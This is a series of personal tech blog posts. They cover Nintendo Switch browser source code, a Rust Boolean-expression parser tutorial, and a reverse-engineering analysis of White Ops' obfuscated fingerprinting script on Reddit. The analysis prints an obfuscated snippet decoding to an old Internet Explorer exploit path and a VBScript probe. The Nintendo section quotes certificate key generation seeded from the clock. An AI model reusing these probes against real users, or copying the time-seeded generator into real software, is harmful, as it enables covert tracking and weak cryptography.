    "TrustedLabelHash": "5znhThZ3xzv6l+uQTC2qtBUIn+l4v2gdmHRD0Y/bl0j3NE3rN1EMwNE+kj5dpk/l"
}

It looks like they have software (Titus) that automatically adds metadata about how emails are classified/protected. Neat! I unfortunately have not gotten any secret information emailed to me so I don’t know what this would look like if the email was classified (although hopefully Titus would be able to prevent sending classified emails to people like me who shouldn’t have access to it).

It also seems like this header isn’t present in automated emails, which go through a different system to get to me.

Interesting things in Nintendo's OSS code

By · · 6 minute read

The Nintendo Switch (called the Nintendo NX during development and called the NX in the source code) has some open source parts, and Nintendo very kindly allows the source code for these parts to be viewed. They don’t make it easy though: you have figure out how to download a ZIP file from a Japanese website. I’ve put it on GitHub if you want to take a look easily. The source code is almost entirely just the code behind the browser in the Nintendo Switch, although it’s not exactly easy to load this browser in the first place without instructions on how to do so. I’m fairly suprised that Nintendo went through all the effort to include a whole browser in the Switch despite only being used when someone’s on a Wi-Fi network that require login – not exactly a common scenario, given that most of the time Switches will be connected to personal networks without any such weird portals. According to the source code, the name of the browser is “NetFront Browser NX”. NetFront appears to be the creator of this browser.

It’s not actually possible to run the NetFront Browser NX locally, because it depends on the Switch SDK, which you have to sign an NDA with Nintendo to even get a chance of being able to use.

I’ve picked out some things that are at least moderately interesting from the OSS source code. Most of the changes Nintendo has done are really mundane, and I’ve left those out. These mundane things are mostly renaming main functions to Nintendo’s preferred naming convention (I think they have some sort of testing framework that looks for testMain).

Something that happens across all these directories is the use of the nxLog* family of functions, which are like printf but slightly different to suit the Switch’s needs.

src_0.16.0 and src_1.16.10

I’m not actually sure what or why these directories were included. All of the files in these directories start with a licence that is definitely not open-source:

/*--------------------------------------------------------------------------------*
  Copyright (C)Nintendo. All rights reserved.

  These coded instructions, statements, and computer programs contain
  information of Nintendo and/or its licensed developers and are protected
  by national and international copyright laws.

  THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
  OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
  MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
  IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
  CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
  TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
  SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
 *--------------------------------------------------------------------------------*/

But if we take a look anyways, it seems like given the weird Assembly and C++ code this is providing the glue for Webkit to work on the Switch OS. Also it seems to imply that the browser is compiled with musl.

nss

Looks like Nintendo is a fan of static linking (nss/lib/freebl/loader.c):

/*  On NNSDK we statically link all of our libs, so we don't really need to
    load anything or do the symbol redirection done on other platforms.  */

They increase the DEFAULT_OCSP_CACHE_SIZE from 64 to 1000 on the Switch because I guess more caching is good?

In nss/cmd/certutil/keystuff.c they change certificate generation to use the current time (PR_Now()) instead of actual randomness to create certificates. I sure hope certificates generated this way were only used for testing…

#ifdef NN_NINTENDO_SDK
/*  Rather than take key input, use a psuedo-RNG  */
#define XOR_SHIFT_STAR_64_SPECIAL_VAL   (2685821657736338717ULL)

static PRUint64 xorShiftStar64State = 0;

static PRUint64 genPsRandXorShiftStar() {
    if (xorShiftStar64State == 0) {
        xorShiftStar64State = PR_Now();
    }

    xorShiftStar64State ^= xorShiftStar64State >> 12;
    xorShiftStar64State ^= xorShiftStar64State << 25;
    xorShiftStar64State ^= xorShiftStar64State >> 27;
    return xorShiftStar64State * XOR_SHIFT_STAR_64_SPECIAL_VAL;
}

#endif

webkit_1.16.10

The only interesting things here are that the CSS media queries -webkit-nintendo-switch-device-console and -webkit-nintendo-switch-device-handheld are added. They can be used to detect the if the switch is docked or not. Neat!

WKC_0.16.0/WKC_1.16.10

This appears to be the code that takes the libraries and makes them into an actual browser, with the needed UI, and platform integrations. It looks like many of the files here were written for the sole purpose of being used in the Switch browser. Searching for most of the lines in these files turns up only repos with the Switch source code. They have a lot of code ifdefed behind things like WKC_CUSTOMER_PATCH_0304674: it appears that NetFront has other clients, and these patches are just for Nintendo (or maybe Nintendo and also some other clients?)

Looks like they’re taking a step in the right direction here and disabling support for the outdated SSLv2 and SSLv3 protocols at compile time!

#if defined(SSL_OP_NO_SSLv2) && !defined(OPENSSL_NO_SSL2)
#define OPENSSL_SUPPORT_SSLv2
#undef OPENSSL_SUPPORT_SSLv2 // NX never support SSLv2
#endif
#if defined(SSL_OP_NO_SSLv3) && !defined(OPENSSL_NO_SSL3)
#define OPENSSL_SUPPORT_SSLv3
#undef OPENSSL_SUPPORT_SSLv3 // NX never support SSLv3
#endif

The Switch browser appears to be one of the first with support for Web NFC, presumably using the NFC reader in the Switch. Neat!

Let me know if you find any other interesting things in the source!

internet

By · · 0 minute read

ttw

By · · 0 minute read

Writing a Boolean expression parser in Rust

By · · 15 minute read

While using my time tracking system, TagTime Web, I have on many occasions wanted to use some complex logic to select pings. My first implementation of this just had a simple way to include and exclude pings, but this later proved to be insufficent for my needs. I considered implementing a more complex system at first, but I decided it was a good idea to wait until the need actually arised before building a more complex system like this. Here, I will explain how I implemented this new system. Well, after using TagTime Web for a while, the need has arrised, at least for me, so I built such a query system.

Here are some example queries, each with different syntax, demonstrate the range of ways queries can be formulated:

  • To find time I’m distracted on social media, I can use a query like distracted and (hn or twitter or fb)
  • To find time I’m programming something other than TagTime Web, I can do code & !ttw
  • To find time I’m using GitHub but not for programming or working on TagTime Web, I can do gh AND !(code OR ttw)

My main goal with the query design was to make it very simple to understand how querying works – I didn’t want to make users read a long document before writing simple queries. I also wanted to write it in Rust, because I like Rust. It can be run in the browser via WebAssembly, and since I was running WASM in the browser already I wasn’t going to lose any more browser support than I already had. Rust is also pretty fast, which is a good thing, especially on devices with less computing power like phones (although I don’t think it made much of a difference in this case).

Let’s dive in to the code. You can follow along with the source code if you want, but note that I explain the code a bit differently than the order of the actual source code. There are three main phases in the system: lexing, parsing, and evaluation.

Lexing

In the lexing phase, we convert raw text to a series of tokens that are easier to deal with. In this phase, different syntaxical ways to write the same thing will be merged. For example, & and and will be repersented with the same token. Lexing won’t do any validation that the provided tokens are sensical though: this phase is completely fine with unmatched brackets and operators without inputs. Here’s what the interface is going to look like:

let tokens = lex("foo and !(bar | !baz)").unwrap();
assert_eq!(
    tokens,
    vec![
        Token::Name { text: "foo".to_string() },
        Token::BinaryOp(BinaryOp::And),
        Token::Invert,
        Token::OpenBracket,
        Token::Name { text: "bar".to_string() },
        Token::BinaryOp(BinaryOp::Or),
        Token::Invert,
        Token::Name { text: "baz".to_string() },
        Token::CloseBracket
    ]
);

Let’s start implementing that. We’ll start by defining what a token is:

#[derive(Debug, Clone, PartialEq, Eq)]
enum Token {
    OpenBracket,
    CloseBracket,
    Invert,
    Name { text: String },
    BinaryOp(BinaryOp),
}

Instead of having two different tokens for &/and and |/or, I’ve created a single BinaryOp token type, since the two types of tokens will be treated the same after the lexing phase. It’s just an enum with two variants, although I could easily add more if I decide so in the future:

#[derive(Debug, Copy, Clone, PartialEq, Eq)]
enum BinaryOp {
    And,
    Or,
}

I’ve also implemented a few helper methods: from_char, as_char, and from_text that will help with lexing. Now let’s get on to actually lexing. We’ll declare a fn that takes a &str and returns a Vec<Token>. We start out by defining the ParseState enum, inside lex:

fn lex(s: &str) -> Result<Vec<Token>, &'static str> {
    #[derive(Debug, Copy, Clone, Eq, PartialEq)]
    enum ParseState {
        /// Ready for any tokens.
        AnyExpected,
        /// In a name.
        InName,
        /// In a binary operation repersented with symbols.
        InSymbolBinOp(BinaryOp),
    }

    let mut state = ParseState::AnyExpected;
    let mut tokens = Vec::new();
    let mut cur_name = String::new();

Did you know that you can define an enum inside a fn? This is pretty neat: it allows you to define an enum that’s only available inside the fn that defined it, which helps prevent implementation details from being exposed and used in other places. We’ll use this throughout lexing to keep track of what we’re currently looking at. Next, we’ll break up the input string into individual UTF-8 characters, and loop over them:

for c in s.chars() {

Okay, time for the fun part: let’s build tokens out of these characters.

// the last token was "|" or "&", which has some special logic
if let ParseState::InSymbolBinOp(op) = state {
    state = ParseState::AnyExpected; // only do this for the immediate next char
    if c == op.as_char() {
        // treat "|" and "||" the same way
        continue;
    }
}

if state == ParseState::InName {
    let end_cur_token = match c {
        // stop parsing a tag as soon as we see a character starting a operator
        '(' | ')' | '!' => true,
        _ if BinaryOp::from_char(c) != None => true,

        _ if c.is_whitespace() => true, // whitespace also ends a tag
        
        _ => false,
    };
    if end_cur_token {
        let lower = cur_name.to_ascii_lowercase(); // tags are case insensitive

        if let Some(op) = BinaryOp::from_text(&lower) {
            // append the token
            tokens.push(Token::BinaryOp(op));
        } else {
            // the token is "and" or "or", so treat it like a binary operation
            tokens.push(Token::Name { text: cur_name });
        }

        cur_name = String::new(); // reset the current tag
        
        state = ParseState::AnyExpected; // anything could occur next
    } else {
        // not ending the current token, so add this character to the current tag
        cur_name.push(c);
    }
}

// any token could happen!
if state == ParseState::AnyExpected {
    let op = BinaryOp::from_char(c); // try to make a binary op out of the token
    match c {
        _ if op != None => {
            // we managed to create a binary operation
            tokens.push(Token::BinaryOp(op.unwrap()));
            state = ParseState::InSymbolBinOp(op.unwrap());
        }

        // operators
        '(' => tokens.push(Token::OpenBracket),
        ')' => tokens.push(Token::CloseBracket),
        '!' => tokens.push(Token::Invert),

        // ignore whitespace
        _ if c.is_whitespace() => {}
        
        // didn't start anything else, so we must be starting a tag
        _ => {
            state = ParseState::InName;
            cur_name = String::with_capacity(1);
            cur_name.push(c);
        }
    }
}

Finally, we check if there is any remaining tag tag info and return the tokens:

if !cur_name.is_empty() {
    let lower = cur_name.to_ascii_lowercase();
    if let Some(op) = BinaryOp::from_text(&lower) {
        tokens.push(Token::BinaryOp(op));
    } else {
        tokens.push(Token::Name { text: cur_name });
    }
}
tokens

Parsing

Here, we’ll take the stream of tokens and build it into an abstract syntax tree (AST). Here’s an example diagram (edit on quiver):

An AST diagram

This will repersent the expression in a way that’s easy to evaluate. Here’s the definition:

#[derive(Debug, Clone, PartialEq, Eq)]
enum AstNode {
    /// The `!` operator
    Invert(Box<AstNode>),
    /// A binary operation
    Binary(BinaryOp, Box<AstNode>, Box<AstNode>),
    /// A name
    Name(String),
}

Munching tokens

Let’s implement the core of the parsing system that converts a stream of Token to a single AstNode (probably with more AstNodes nested). It’s called munch_tokens because it munches tokens until it’s done parsing the expression it sees. When it encounters brackets, it recursively evaluates the tokens in the brackets until it’s done with the stuff in brackets. If there are still tokens left after the top level call, then there are extra tokens at the end: an error. Here’s the declaration of munch_tokens:

impl AstNode {
    fn munch_tokens(
        tokens: &mut VecDeque<Token>,
        depth: u16,
    ) -> Result<Self, &'static str> {
        if depth == 0 {
            return Err("expression too deep");
        }
        // ...
    }
}

Notice that if there was an error doing parsing, a static string is returned. Most parsers would include more detailed information here about where the error occured, but to reduce complexity I haven’t implemented any such logic. Also note that the input is a VecDeque instead of a normal Vec, which will make it faster when we take tokens off the front often. I could also have implemented this by having the token input be reversed, and then manipulating the back of the token list, but it would make the code more complicated for fairly minimal performance gains. We also use depth to keep track of how deep we are going, and error if we get too deep to limit the amount of computation we do, since we might be evaulating an expression with untrusted user input.

Now let’s write the core token munching loop using a while let expression. We can’t use a normal for loop here, since the tokens will be mutated in the loop.

while let Some(next) = tokens.get(0) {
    // ...
}
Err("unexpected end of expression")

Now for each token, we’ll match against it, and decide what to do. For some tokens, we can just error at that point.

match next {
    // some tokens can't happen here
    Token::CloseBracket => return Err("Unexpected closing bracket"),
    Token::BinaryOp(_) => return Err("Unexpected binary operator"),
    // ...
}

For tag names, we need to disambiguate between two cases: is the token being used by itself, or with a Boolean operator? When binary operators are between tokens we need to look ahead to figure out this context. If we were to use Reverse Polish Notation then we wouldn’t have this problem, but alas we are stuck with harder to parse infix notation. If the parser sees such amgiuity, it fixes it by adding implict opening and closing brackets, and trying again:

match next {
    // <snip>
    Token::Name { text } => {
        // could be the start of the binary op or just a lone name
        match tokens.get(1) {
            Some(Token::BinaryOp(_)) => {
                // convert to unambiguous form and try again
                tokens.insert(1, Token::CloseBracket);
                tokens.insert(0, Token::OpenBracket);
                return Self::munch_tokens(tokens, depth - 1);
            }
            Some(Token::CloseBracket) | None => {
                // lone token
                let text = text.clone();
                tokens.remove(0);
                return Ok(AstNode::Name(text));
            }
            Some(_) => return Err("name followed by invalid token"),
        }
    }
}

Next, let’s implement opening brackets. We munch the tokens inside the bracket, remove the closing bracket, then do the same binary operation checks as with tag names.

match next {
    // <snip>
    Token::OpenBracket => {
        tokens.remove(0); // open bracket
        let result = Self::munch_tokens(tokens, depth - 1)?;
        match tokens.remove(0) {
            // remove closing bracket
            Some(Token::CloseBracket) => {}
            _ => return Err("expected closing bracket"),
        };
        // check for binary op afterwards
        return match tokens.get(0) {
            Some(Token::BinaryOp(op)) => {
                let op = op.clone();
                tokens.remove(0).unwrap(); // remove binary op
                let ret = Ok(AstNode::Binary(
                    op,
                    Box::new(result),
                    Box::new(Self::munch_tokens(tokens, depth - 1)?),
                ));
                ret
            }
            Some(Token::CloseBracket) | None => Ok(result),
            Some(_) => Err("invald token after closing bracket"),
        };
    }
}

Okay, one operator left: the ! operator, which negates its contents. I’ve made the design decision not to allow expressions with double negatives like !!foo, since there’s no good reason to do that.

match next {
    // <snip>
    Token::Invert => {
        tokens.remove(0);
        // invert exactly the next token
        // !a & b -> (!a) & b
        match tokens.get(0) {
            Some(Token::OpenBracket) => {
                return Ok(AstNode::Invert(Box::new(Self::munch_tokens(
                    tokens,
                    depth - 1,
                )?)));
            }
            Some(Token::Name { text }) => {
                // is it like "!abc" or "!abc & xyz"
                let inverted = AstNode::Invert(Box::new(AstNode::Name(text.clone())));
                match tokens.get(1) {
                    Some(Token::BinaryOp(_)) => {
                        // "!abc & xyz"
                        // convert to unambiguous form and try again
                        tokens.insert(0, Token::OpenBracket);
                        tokens.insert(1, Token::Invert);
                        tokens.insert(2, Token::OpenBracket);
                        tokens.insert(4, Token::CloseBracket);
                        tokens.insert(5, Token::CloseBracket);
                        return Self::munch_tokens(tokens, depth - 1);
                    }
                    None | Some(Token::CloseBracket) => {
                        // "!abc"
                        tokens.remove(0); // remove name
                        return Ok(inverted);
                    }
                    Some(_) => return Err("invalid token after inverted name"),
                }
            }
            Some(Token::Invert) => {
                return Err("can't double invert, that would be pointless")
            }
            Some(_) => return Err("expected expression"),
            None => return Err("expected token to invert, got EOF"),
        }
    }
}

Evaluation

Thanks to the way AstNode is written, evaluating AstNodes against some tags is really easy. By design, we can just recursively evaluate AST nodes.

impl AstNode {
    fn matches(&self, tags: &[&str]) -> bool {
        match self {
            Self::Invert(inverted) => !inverted.matches(tags),
            Self::Name(name) => tags.contains(&&**name),
            Self::Binary(BinaryOp::And, a1, a2) => a1.matches(tags) && a2.matches(tags),
            Self::Binary(BinaryOp::Or, a1, a2) => a1.matches(tags) || a2.matches(tags),
        }
    }
}

The only weird thing here is &&**name, which looks really weird but is the right combination of symbols needed to convert a &String to a &&str (it goes &String -> String -> str -> &str -> &&str).

Putting it all together

We don’t want to expose all of these implementation details to users. Let’s wrap all of this behind a struct that takes care of calling the lexer and building an AST for our users. If we decide to completly change our implementation in the future, nobody will know since we’ll have a very small API surface. There’s one more case we want to handle here: the empty input. AstNode can’t handle empty input, so we’ll implement that in our wrapper. This seems like it would work:

pub enum ExprData {
    Empty,
    HasNodes(AstNode),
}

But if you try that you’ll get a compile error.

error[E0446]: private type `AstNode` in public interface
  --> src/lib.rs:16:14
   |
8  | enum AstNode {
   | ------------ `AstNode` declared as private
...
16 |     HasNodes(AstNode),
   |              ^^^^^^^ can't leak private type

In Rust, data stored in enum variants are always implictly pub, so this wrapper would allow users access to internal implementation details, which we don’t want. We can work around that by wrapping our wrapper:

#[derive(Debug, Clone, PartialEq, Eq)]
enum ExprData {
    Empty,
    HasNodes(AstNode),
}

#[derive(Debug, Clone, PartialEq, Eq)]
pub struct Expr(ExprData);

Now let’s implement some public fns that wrap the underlying AstNode:

const MAX_RECURSION: u16 = 20;

impl Expr {
    pub fn from_string(s: &str) -> Result<Self, &'static str> {
        // lex and convert to a deque
        let mut tokens: VecDeque<Token> = lex(s).into_iter().collect();
        if tokens.is_empty() {
            // no tokens
            return Ok(Self(ExprData::Empty));
        }

        let ast = AstNode::munch_tokens(&mut tokens, MAX_RECURSION)?;
        if !tokens.is_empty() {
            return Err("expected EOF, found extra tokens");
        }

        Ok(Self(ExprData::HasNodes(ast)))
    }

    pub fn matches(&self, tags: &[&str]) -> bool {
        match &self.0 {
            ExprData::Empty => true,
            ExprData::HasNodes(node) => node.matches(tags),
        }
    }
}

That’s it! If you want some more Boolean expression content, check out the test suite for some more moderately interesting tests.

TagTime Web: my stochastic time tracking web app

By · · 2 minute read

Recently I’ve been working on TagTime Web (my server, but you can host your own). It’s an open-source web-based version of the original TagTime. It uses stochastic time tracking, which randomly samples what you are doing through out the day (on average 45 minutes apart by default). This page explains it quite well. I have also made a video about how this type of time tracking works, and a demonstration video.

Here are some features it has:

  • Each tag gets a unique colour based on the name of it
  • Tag autocomplete
  • Dark mode
  • Mobile support
  • Offline support (it is a PWA)
  • Filtering pings
  • Charts!
    • Daily distribution
    • Daily trend
    • Matrix

Check it out!

reddit

By · · 0 minute read

Reddit's website uses DRM for fingerprinting

By · · 4 minute read

Recently, I was using a page on Reddit (i.e. the main redesign domain, not old.reddit.com), when I saw a yellow bar from Firefox:

Reddit asking for permission to use DRM

Why did Reddit want to use DRM? This pop-up was appearing on all pages, even on pages with no audio or video. To find out, I did a bunch of source code analysis and found out.

Reddit’s source code uses bundling and minification, but I was able to infer that in ./src/reddit/index.tsx, a script was conditionally loaded into the page. If the show_white_ops A/B test flag was set, then it loaded another script: https://s.udkcrj.com/ag/386183/clear.js. That script loads https://s.udkcrj.com/2/4.71.0/main.js (although it appears to test for a browser bug involving running JSON.parse with null bytes, and sometimes loads https://s.udkcrj.com/2/4.71.0/JSON-main.js instead, but I haven’t analyzed this file (it looks fairly similar though), and also does nothing if due to another browser bug, !("a" == "a"[0]) evaluates to true).

The purpose of all of this appears to be both fingerprinting and preventing ad fraud. I’ve determined that udkcrj.com belongs to White Ops. (edit: they have recently rebranded to HUMAN) I have infered this from the name of Reddit’s feature flag, and mentions of White Ops which is a “global leader in bot mitigation, bot prevention, and fraud protection”. They appear to do this by collecting tons of data about the browser, and analyzing it. I must say, their system is quite impressive.

Back to the DRM issue, it appears that the script is checking what DRM solutions are available, but not actually using them. However, just checking is enough to trigger Firefox into displaying the DRM popup. Specfically, it looks for Widevine, PlayReady, Clearkey, and Adobe Primetime.

main.js does a bunch of other interesting things, but there’s so many that I’ve written a whole seperate blog post about all of the ones I found. Here are some highlights:

  • Contains what appears to be a Javascript engine JIT exploit/bug, "haha jit go brrrrr" appears in a part of the code that appears to be doing something weird with math operations.
  • Has an obfuscated reference to res://ieframe.dll/acr.js, which can be used to exploit old Internet Explorer versions (I think)
  • Many checks for various global variables and other indicators of headless and automated browsers.
  • Sends data to vprza.com and minkatu.com.
  • Checks if devtools is open
  • Detects installed text to speech voices
  • Checks if browsers have floating point errors when rounding 0.49999999999999994 and 2^52
  • Detects if some Chrome extensions are installed
  • Checks if function bodies that are implemented in the browser contain [native code] when stringified
    • it get’s kinda meta, it checks if toString itself is implemented in native code (although it doesn’t go any levels deeper than data)
  • Checks for Apple Pay support

Weird. Thanks for reading.

whiteops

By · · 0 minute read

Data WhiteOps collects

By · · 11 minute read

Edit: White Ops has recently rebranded to HUMAN.

Today I noticed New Reddit was asking to use DRM. So I went on a source code analysis journey! See the main post for more details.

It appears Reddit uses White Ops for fingerprinting and ad fraud prevention (but only sometimes, I think it’s an A/B test). See this beautified code:

const t = e.user.account ? Jt()(e.user.account.id).toString() : void 0,
    s = document.createElement("script");
s.src = Object(es.a)("https://s.udkcrj.com/ag/386183/clear.js", {
    dt: "3861831591810830724000",
    pd: "acc",
    mo: 0,
    et: 0,
    ti: $t()(),
    ui: t,
    si: "d2x"
}), document.head.appendChild(s)

This code is only run if the show_white_ops feature flag is enabled (don’t know how to force this to be true), which is why I assume the tracking is done by WhiteOps. Further research into the https://s.udkcrj.com/ag/386183/clear.js file reveals that it ends up loading another script, https://s.udkcrj.com/2/4.71.0/main.js.

Note: here is a function I used to deobfuscate many strings in the code:

const deob = x => x.replace(/[A-Za-z]/g, function(e) {
    return String.fromCharCode(e.charCodeAt(0) + (e.toUpperCase() <= "M" ? 13 : -13))
})

Note 2: Ozoki appears to be some sort of internal codename used by WhiteOps.

This very obfuscated script does many things, including (this is an incomplete list, I have missed many things):

  • Communicates with vprza.com and minkatu.com
  • Does device/OS detection
  • Attempts to detect if DevTools is open (looks at __IE_DEVTOOLBAR_CONSOLE_COMMAND_LINE)
  • Something weird with the text-underline-offset CSS property
  • Has the names of a bunch of ad servers, presumably as to not serve ads to bots
  • Attempts to create an ActiveXObject (only exists in old IE versions), and checks if the created ActiveX object isSandboxed
  • Checks for maxConnectionsPerServer and onhelp properties on window (for browser engine detection I think)
  • Attempts to exploit an IE11 vuln!
    • it checks the value of document.documentMode, which in IE11 is 11. If it is, then it runs the obfuscated code:
// o == document.documentMode == 11
"}o|B65niitbmd,ahg)Z[i$_g".replace(/./g, function(e) {
    return String.fromCharCode(e.charCodeAt(0) - o--)
})
  • this evaluates to res://ieframe.dll/acr.js, but only on IE. This string has only one purpose, exploiting the fact that you can put arbitrary HTML in the hash part of the URL and have it get evaluated, I beleive in a privledged context of some sort. This file actually resolves in IE to a internal Windows system file, which is only accessible in JS due to a bug.
  • tries to run VBScript:
execScript("e71012934811a=false::On Error Resume Next::" + e + "::if Err.Number=-2147024891 or Err.Number=5002 then e71012934811a=true::Err.Clear", "VBScript"), t = "e71012934811a" in window ? window.e71012934811a ? o.EXISTS : o.MISSING : o.UNKNOWN
  • checks for these strings on window (de-obfuscated, I also have the original obfuscated ones in case you are also looking through the source):
    • boltsWebViewAppLinkResolverResult, GoogleJsInterface, googleAdsJsInterface, accessibilityTraversal, accessibility, FbPlayableAd, __REACT_WEB_VIEW_BRIDGE
    • obfuscated in code as obygfJroIvrjNccYvaxErfbyireErfhyg, TbbtyrWfVagresnpr, tbbtyrNqfWfVagresnpr, npprffvovyvglGenirefny, npprffvovyvgl, SoCynlnoyrNq, __ERNPG_JRO_IVRJ_OEVQTR
  • checks the screen’s availHeight, availWidth, width, and `height
  • checks the screen’s colorDepth, pixelDepth, and devicePixelRatio
  • checks for these automation-related properties on window: domAutomation, domAutomationController, _WEBDRIVER_ELEM_CACHE, _phantom, callPhantom, window.chrome._commandLineAPI, window.Debug.debuggerEnabled, __BROWSERTOOLS_CONSOLE, window._FirebugCommandLine, and also if document.documentElement.hasAttribute("webdriver") is true
  • checks if "function () { return Function.apply.call(x.log, x, arguments); }" == window.console.log.toString() (also to check for browser automation I guess
  • tries to check if the browser is headless with isExternalUrlSafeForNavigation, window.opera._browserjsran, window.opera.browserjsran
  • checks if navigator.onLine is true
  • check the window.chrome object if in Chrome
  • extracts data from window.FirefoxInterfaces("wdICoordinate", "wdIMouse", "wdIStatus")
  • checks if window.XPCOMUtils exists
  • checks if window.netscape.security.privilegemanager exists
  • appears to check browser console timing
  • checks referer against "https://www.google.com", "https://apps.skype.com", "http://apps.skype.com", "https://www.youtube.com", "http://en.wikipedia.org/", "https://en.wikipedia.org/", "https://www.netflix.com", "http://www.netflix.com", "http://www3.oovoo.com"
  • checks for these properties in window.external: ["AddChannel", "AddDesktopComponent", "AddFavorite", "AddSearchProvider", "AddService", "AddToFavoritesBar", "AutoCompleteSaveForm", "AutoScan", "bubbleEvent", "ContentDiscoveryReset", "ImportExportFavorites", "InPrivateFilteringEnabled", "IsSearchProviderInstalled", "IsServiceInstalled", "IsSubscribed", "msActiveXFilteringEnabled", "msAddSiteMode", "msAddTrackingProtectionList", "msClearTile", "msEnableTileNotificationQueue", "msEnableTileNotificationQueueForSquare150x150", "msEnableTileNotificationQueueForSquare310x310", "msEnableTileNotificationQueueForWide310x150", "msIsSiteMode", "msIsSiteModeFirstRun", "msPinnedSiteState", "msProvisionNetworks", "msRemoveScheduledTileNotification", "msReportSafeUrl", "msScheduledTileNotification", "msSiteModeActivate", "msSiteModeAddButtonStyle", "msSiteModeAddJumpListItem", "msSiteModeAddThumbBarButton", "msSiteModeClearBadge", "msSiteModeClearIconOverlay", "msSiteModeClearJumpList", "msSiteModeCreateJumpList", "msSiteModeRefreshBadge", "msSiteModeSetIconOverlay", "msSiteModeShowButtonStyle", "msSiteModeShowJumpList", "msSiteModeShowThumbBar", "msSiteModeUpdateThumbBarButton", "msStartPeriodicBadgeUpdate", "msStartPeriodicTileUpdate", "msStartPeriodicTileUpdateBatch", "msStopPeriodicBadgeUpdate", "msStopPeriodicTileUpdate", "msTrackingProtectionEnabled", "NavigateAndFind", "raiseEvent", "setContextMenu", "ShowBrowserUI", "menuArguments", "onvisibilitychange", "scrollbar", "selectableContent", "version", "visibility", "mssitepinned", "AddUrlAuthentication", "CloseRegPopup", "FeatureEnabled", "GetJsonWebData", "GetRegValue", "Log", "LogShellErrorsOnly", "OpenPopup", "ReadFile", "RunGutsScript", "SaveRegInfo", "SetAppMaximizeTimeToRestart", "SetAppMinimizeTimeToRestart", "SetAutoStart", "SetAutoStartMinimized", "SetMaxMemory", "ShareEventFromBrowser", "ShowPopup", "ShowRadar", "WriteFile", "WriteRegValue", "summonWalrus" and also "AddSearchProvider", "IsSearchProviderInstalled", "QueryInterface", "addPanel", "addPersistentPanel", "addSearchEngine"
  • checks maxConnectionsPerServer (on Window I think)
  • attempts to detect Brave Browser with window.brave
  • checks for a bunch more properties on window:
                m("document_referrer", h), m("performance_timing", h, function(e) {
                    return x.qKjvb(e)
                }), m("maxConnectionsPerServer", h), m("status", h), m("defaultStatus", h), m("performance_memory", h, _.flatten), m("screen", h, function(e) {
                    return e || {}
                }), m("devicePixelRatio", h), m("mozPaintCount", h), m("styleMedia_type", h), m("history_length", h), m("opener", h, "top_opener", function(e) {
                    return null !== e ? typeof e : "null"
                }), m("navigator_userAgent", h), m("fileCreatedDate", h), m("fileModifiedDate", h), m("fileUpdatedDate", h), m("lastModified", h), m("location_href", h), m("RemotePlayback", h), m("Permissions", h), m("Notification", h), m("MediaSession", h), m("name", h, function(e) {
                    return e.substr(0, 128)
                }), m("defaultView", h, "document_defaultView", function(e) {
                    return void 0 === e ? "undefined" : e === window
                }), m("console", h, _.flatten), m("localStorage", h, v), m("webkitNotifications", h, v), m("webkitAudioContext", h, v), m("chrome", h, k.Keys), m("opera", h, k.Keys), m("navigator_standalone", h), m("navtype", h, "performance_navigation_type"), m("navredirs", h, "performance_navigation_redirectCount"), m("loadTimes", h, "chrome_loadTimes"), m("vendor", h, "navigator_vendor"), m("codename", h, "navigator_appCodeName"), m("navWebdriver", h, "navigator_webdriver"), m("navLanguages", h, "navigator_languages"), m("ServiceWorker", h), m("ApplePaySetup", h), m("ApplePaySession", h), m("Cache", h), m("PaymentAddress", h), m("MerchantValidationEvent", h), m("mediaDevices", h, "navigator_mediaDevices"), m("share", h, "navigator_share"), m("onorientationchange", h), m("document_defaultView_safari", h), m("navigator_brave", h), m("navigator_brave_isBrave", h), le.hco && m("navHardwareConc", h, "navigator_hardwareConcurrency"), le.ndm && m("navDevMem", h, "navigator_deviceMemory"), le.nvl && (m("navLocks", h, "navigator_locks", function(e) {
                    var t = typeof e;
                    return "undefined" === t ? "undefined" : "object" === t ? "obj" : e
                }), m("navLocksR", h, "navigator_locks_request", function(e) {
                    return "undefined" === typeof e ? "undefined" : e
                })), le.wor && m("origin", h, "origin"), "object" == typeof location && m("protocol", location), "object" == typeof document && (m("hidden", document), m("documentMode", document), m("compatMode", document), m("visibilityState", document), m("d_origin", document, "origin"), m("ddl_origin", document, "defaultView_location_origin"));
  • checks mozIsLocallyAvailable (which is only available on FF <= 35, and could be for checking if someone is trying to debug this script offline)
  • checks how rounding of large and small numbers works, with Math.round(.49999999999999994) and Math.round(Math.pow(2, 52))
  • checks the installed plugins (with navigator.plugins)
  • checks the browser viewport
  • attempts to get the “frame depth” (not sure what exactly that is)
  • checks for various status bars on window ("locationbar", "menubar", "personalbar", "scrollbars", "statusbar", "toolbar")
  • checks for window.showModalDialog
  • checks the -webkit-text-size-adjust property
  • checks if using xx-small as a font size works
  • Checks if image loading is enabled, by trying to load a 1x1 GIF
  • Tries to load an image with a URL of https:/, and checking if it loaded or errored
  • Checks the stringification o
  • checks for these properties on window: StorageItem AnimationTimeline MSFrameUILocalization HTMLDialogElement mozCancelRequestAnimationFrame SVGRenderingIntent SQLException WebKitMediaKeyError SVGGeometryElement SVGMpathElement Permissions devicePixelRatio GetSVGDocument HTMLHtmlElement CSSCharsetRule ondragexit MediaSource external DOMMatrix InternalError ArchiveRequest ByteLengthQueuingStrategy ScreenOrientation onwebkitwillrevealbottom onorientationchange WebKitGamepad GeckoActiveXObject mozInnerScreenX WeakSet PaymentRequest Generator BhxWebRequest oncancel fluid media onmousemove HTMLCollection OpenWindowEventDetail FileError SmartCardEvent guest CSSConditionRule showModelessDialog SecurityPolicyViolationEvent EventSource ServiceWorker EventTarget origin VRDisplay onpointermove HTMLBodyElement vc2hxtaq9c TouchEvent DeviceStorage DeviceLightEvent External webkitPostMessage HTMLAppletElement ErrorEvent URLSearchParams BluetoothRemoteGATTDescriptor RTCStatsReport EventException PERSISTENT MediaKeyStatusMap HTMLOptionsCollection dolphinInfo MSGesture SVGPathSegLinetoRel webkitConvertPointFromNodeToPage doNotTrack CryptoDialogs HTMLPictureElement MediaController
